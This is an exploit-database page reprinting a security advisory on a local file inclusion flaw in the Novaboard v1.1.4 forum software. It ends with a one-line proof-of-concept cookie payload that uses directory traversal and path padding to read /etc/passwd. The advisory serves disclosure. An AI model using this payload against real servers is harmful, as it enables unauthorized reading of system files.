[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Novaboard v1.1.4 Local File Inclusion Vulnerability

Author
High-Tech Bridge
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14607
Category
web applications
Date add
28-10-2010
Platform
php
===================================================
Novaboard v1.1.4 Local File Inclusion Vulnerability
===================================================

Reference: http://www.htbridge.ch/advisory/lfi_in_novaboard.html
Product: Novaboard
Vendor: Novaboard  ( http://www.novaboard.net/ )
Vulnerable Version: 1.1.4 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
 
Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in nova_lang variable from cookie.
 
The following PoC is available:
 
 
Cookie: nova_lang=../../../../../../../../../../../../../../etc/passwd/././././.[>4095 * "/."]/././././.



#  0day.today [2024-09-28]  #